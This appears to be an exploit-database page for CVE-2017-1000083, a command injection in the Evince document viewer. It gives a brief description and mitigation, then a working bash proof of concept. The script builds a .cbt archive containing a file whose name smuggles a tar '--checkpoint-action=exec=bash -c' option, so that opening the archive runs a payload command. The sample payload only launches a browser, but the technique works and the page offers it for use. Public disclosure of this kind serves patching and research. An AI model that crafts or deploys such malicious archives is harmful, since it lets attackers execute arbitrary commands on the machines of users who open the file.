header-logo
Suggest Exploit
vendor:
Evince
by:
Matlink

evince command line injection

A command injection vulnerability was discovered in evince, a document viewer for multiple document formats. The vulnerability is caused due to the improper sanitization of user-supplied input when handling .cbt files. An attacker can exploit this vulnerability by creating a malicious .cbt file and tricking a user into opening it with evince. This will allow the attacker to execute arbitrary commands on the vulnerable system.

Mitigation:

Users should avoid opening untrusted .cbt files with evince. Additionally, administrators should ensure that evince is updated to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083

Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083

#! /bin/bash

# define the payload
export PAYLOAD="firefox google.com"

# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg

# Run the malicious file
evince poc.cbt